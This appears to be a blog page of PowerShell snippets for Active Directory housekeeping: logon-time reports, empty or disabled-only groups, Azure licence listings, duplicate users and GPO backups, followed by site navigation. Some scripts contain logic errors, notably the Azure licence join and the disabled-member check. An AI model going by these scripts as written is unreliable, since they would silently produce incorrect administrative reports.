get-adcomputer -filter * -properties lastlogontimestamp | sort name | select Name, @{N='LastLogontimestamp'; E={[DateTime]::FromFileTime($_.LastLogontimestamp).tostring("dd.MM.yyyy, hh:mm")}}, DistinguishedName | export-csv -path c:\install\adcomputer.csv

List Group-Objects with no member

powershell


Get-ADGroup -Filter * -Properties Members | Where-Object {$_.Members.count -eq 0} | Select Name, GroupCategory, DistinguishedName  | export-csv -path c:\install\emptygroups.csv

List Group-Objects with only disabled members

Powershell

Import-Module ActiveDirectory
$groups = Get-ADGroup -Filter * -Properties Members
$groupsWithDisabledUsers = @()
 
foreach ($group in $groups) {

    $members = Get-ADObject -LDAPFilter "(objectCategory=person)" -SearchBase $group.DistinguishedName -SearchScope OneLevel -ResultSetSize 500000
    $disabledMembers = $members | Where-Object {$_.ObjectClass -eq 'user' -and $_.Enabled -eq $false}

    if ($members.Count -eq $disabledMembers.Count -and $members.Count -gt 0) {
        $groupObject = [PSCustomObject]@{
            GroupName = $group.Name
            DisabledMembers = $disabledMembers.Name
        }
        $groupsWithDisabledUsers += $groupObject
    }
}
 
if ($groupsWithDisabledUsers.Count -gt 0) {
    $outputPath = "C:\Install\groups.csv"
    $groupsWithDisabledUsers | Export-Csv -Path $outputPath -NoTypeInformation
    Write-Host "Groups with only disabled users exported to $outputPath"
}
else {
    Write-Host "No groups found with only disabled users."
}

List User-Objects with last logon time

powershell


get-aduser -filter * -properties lastlogontimestamp | sort name | select Name, @{N='Date LastLogontimestamp'; E={[DateTime]::FromFileTime($_.LastLogontimestamp).tostring("dd.MM.yyyy")}}, @{N='Time LastLogontimestamp'; E={[DateTime]::FromFileTime($_.LastLogontimestamp).tostring("hh:mm")}}, DistinguishedName | export-csv -path c:\install\aduser.csv

List User-Objects with last logon time and there azure licenses

powershell

# Install the Azure AD module if it's not already installed
Install-Module -Name AzureAD -Force
 
# Connect to Azure AD
Connect-AzureAD
 
# Get all users and their license details
$azureADUsers = Get-AzureADUser -All $true | Get-AzureADUserLicenseDetail
 
# Get Active Directory users and their last logon timestamp
$adUsers = Get-ADUser -Filter * -Properties LastLogonTimeStamp |
    Sort-Object -Property Name |
    Select-Object Name,
        @{Name='DateLastLogonTimestamp'; Expression={[DateTime]::FromFileTime($_.LastLogonTimestamp).ToString("dd.MM.yyyy")}},
        @{Name='TimeLastLogonTimestamp'; Expression={[DateTime]::FromFileTime($_.LastLogonTimestamp).ToString("hh:mm")}},
        DistinguishedName
 
# Join Active Directory users with Azure AD license information
$users = $adUsers | ForEach-Object {

    $azureADUser = $azureADUsers | Where-Object { $_.UserPrincipalName -eq $_.DistinguishedName.Split(',')[0].Split('=')[1] }

    [PSCustomObject]@{
        Name = $_.Name
        DateLastLogonTimestamp = $_.DateLastLogonTimestamp
        TimeLastLogonTimestamp = $_.TimeLastLogonTimestamp
        DistinguishedName = $_.DistinguishedName
        AssignedLicenses = $azureADUser.LicenseDetails.ServicePlans.ServicePlanName -join ', '
    }
}
 
# Export the user information to a CSV file

$users | Export-Csv -Path 'C:\install\UserInfo.csv' -NoTypeInformation

Find duplicate users in Active Directory by comparing Displayname

Script can be adapted to search for all ad attributes.

powershell

# Import the Active Directory module
Import-Module ActiveDirectory
 
# Get all user objects from Active Directory
$users = Get-ADUser -Filter * -Properties displayname

# Create a hashtable to store displayname and the corresponding user objects
$userTable = @{}
 
# Loop through each user object
foreach ($user in $users) {
    # Get the displayname
    $upn = $user.displayname
    # If the displayname is not null
    if ($upn) {
        # If the displayname already exists in the hashtable
        if ($userTable.ContainsKey($upn)) {
            # Add the current user object to the existing array
            $userTable[$upn] += $user
        }
        else {
            # Create a new array with the current user object
            $userTable[$upn] = @($user)
        }
    }
}
 
# Filter the hashtable to get only the entries with more than one user object
$duplicateUsers = $userTable.GetEnumerator() | Where-Object { $_.Value.Count -gt 1 }
 
# Output the duplicate users
if ($duplicateUsers) {
    Write-Host "Duplicate users found based on displayname:"
    foreach ($duplicateUser in $duplicateUsers) {
        Write-Host "displayname: $($duplicateUser.Key)"
        $duplicateUser.Value | ForEach-Object {
            Write-Host "`t$($_.Name) ($($_.displayname))"
        }
    }
}
else {
    Write-Host "No duplicate users found based on displayname."
}

Export Group Policies from specific OU and its subtree

powershell

Import-Module -Name ActiveDirectory
 
# – Set Variables

$BaseOU=”OU=Server,DC=ad,DC=test,DC=com”

$RootBackupFolder=”C:\temp”

$BackupFolder=(get-date).ToString(“ddMMyyyy”)
 
# – Create Backup Folder

If (Test-Path $RootBackupFolder\$BackupFolder) {

Write-Verbose “Backup Folder already exists”

Exit}

Else {

New-Item -Path $RootBackupFolder\$BackupFolder -ItemType Directory -Verbose

}
 
# – Main

# — Get all GPO’s linked to OU Recursive
 
 
$OUs = @()
 
$OUs = Get-ADOrganizationalUnit -searchbase $BaseOU -filter *
 
foreach ($OU in $OUs){

    (Get-ADOrganizationalUnit -Identity $OU).LinkedGroupPolicyObjects | % {

    # — Get GPO details

    $GPOGUID=”{” + ($_.Split(“{“)[1]).Split(“}”)[0] + “}”

    $GPOName=(Get-GPO -Guid $GPOGUID).DisplayName

    Write-Verbose “Processing: $GPOName”

    # — Create backup folder based on GPO Name

    New-Item -Path $RootBackupFolder\$BackupFolder\$GPOName -ItemType Directory -Verbose

    # — Backup GPO

    Backup-GPO -Guid $GPOGUID -Path $RootBackupFolder\$BackupFolder\$GPOName -Verbose

    }

}

michaelsendpoint.com

MAM for Contractors | Intune

⚙️ Configuration ​

Mobile Threat Defense (MTD) ​

App Configuration policy ​

Defender for Identity | Security

Licenses ​

How does it work? ​

3rd Party Integrations ​

Sizing ​

Self-Service Local Admin Password (LAPS) automation | Microsoft 365

Winget DSC | Powershell

Winget DSC (Desired State Configuration) ​

👋 Introduction ​

🚀 Start using WinGet & DSC ​

Winget configure ​

Taskbar and Start Menu customization | Intune

Taskbar and Start Menu customization ​

🧑‍🔧 Customize the Windows 11 Taskbar ​

Creating the Taskbar settings XML ​

Test Taskbar XML ​

Deploy Taskbar XML ​

Conclusion ​

🧑‍🔧 Customize the Windows 11 Start layout ​

Creating the Start Menu Layout JSON ​

Deploy Menu Layout JSON ​

Conclusion ​

Windows 365 Configuration | Intune

👋 Introduction ​

📥 Provisioning ​

⚙️ Configuration ​

Provisioning policies ​

Custom images ​

Azure network connection ​

Settings ​

Windows 365 Boot ​

Other Settings ​

🗄️ Windows 365 Reserve ​

⭐ User Experience ​

Cloud PC | Windows 365 | Virtualization

🧑‍💻 What is windows 365? ​

Windows Backup for Organizations | Windows Client | Windows

👋 Introduction ​

🔧 Configuration ​

👤 User Experience ​

💡 Conclusion ​

Windows Server in-place Upgrade to 2025 | Windows Server | Windows

Windows Server in-place Upgrade from 2012 R2 to 2025 ​

👋 Introduction ​

⬆️ Upgrade ​

💡 Conclusion ​

Additional capabilities | Intune Suite | Intune

Additional capabilities of the Intune Suite ​

🚇 Microsoft Tunnel for Mobile Application Management ​

Introduction ​

Architecture ​

Configuration ​

References ​

☁️ Firmware over-the-air update ​

Introduction ​

How to set it up? ​

References ​

📺 Support for specialty devices ​

Introduction ​

How does it work? ​

References ​

Enterprise Application Management | Intune Suite | Intune

Enterprise Application Management ​

👋 Introduction ​

✅ Prerequisites ​

📱 Adding an app with EAM ​

📲 Updating an app with EAM ​

💡 Conclusion ​

What is the Intune Suite? | Intune

👋 Introduction ​

📜 Features ​

💸 Is it worth it? ​

Cloud PKI | Intune Suite | Intune

👋 Introduction ​

✅ Prerequisites ​

⚙️ Configuration

Mobile Threat Defense (MTD)

App Configuration policy

Licenses

How does it work?

3rd Party Integrations

Sizing

Winget DSC (Desired State Configuration)

👋 Introduction

🚀 Start using WinGet & DSC

Winget configure

Taskbar and Start Menu customization

🧑‍🔧 Customize the Windows 11 Taskbar

Creating the Taskbar settings XML

Test Taskbar XML

Deploy Taskbar XML

Conclusion

🧑‍🔧 Customize the Windows 11 Start layout

Creating the Start Menu Layout JSON

Deploy Menu Layout JSON

Conclusion

👋 Introduction

📥 Provisioning

⚙️ Configuration

Provisioning policies

Custom images

Azure network connection

Settings

Windows 365 Boot

Other Settings

🗄️ Windows 365 Reserve

⭐ User Experience

🧑‍💻 What is windows 365?

👋 Introduction

🔧 Configuration

👤 User Experience

💡 Conclusion

Windows Server in-place Upgrade from 2012 R2 to 2025

👋 Introduction

⬆️ Upgrade

💡 Conclusion

Additional capabilities of the Intune Suite

🚇 Microsoft Tunnel for Mobile Application Management

Introduction

Architecture

Configuration

References

☁️ Firmware over-the-air update

Introduction

How to set it up?

References

📺 Support for specialty devices

Introduction

How does it work?

References

Enterprise Application Management

👋 Introduction

✅ Prerequisites

📱 Adding an app with EAM

📲 Updating an app with EAM

💡 Conclusion

👋 Introduction

📜 Features

💸 Is it worth it?

👋 Introduction

✅ Prerequisites

🌊 Architecture & Flow

📃 Certificate fundamentals

Certification authority types

Chaining

🧑‍🔧 Configurating Cloud PKI

Configure Cloud CA

Remote Help

👋 Introduction

✅ Prerequisites

General prerequisites

Platform prerequisites

📊 Data and 🔒 privacy

🧑‍🔧 Configuration

Tenant Config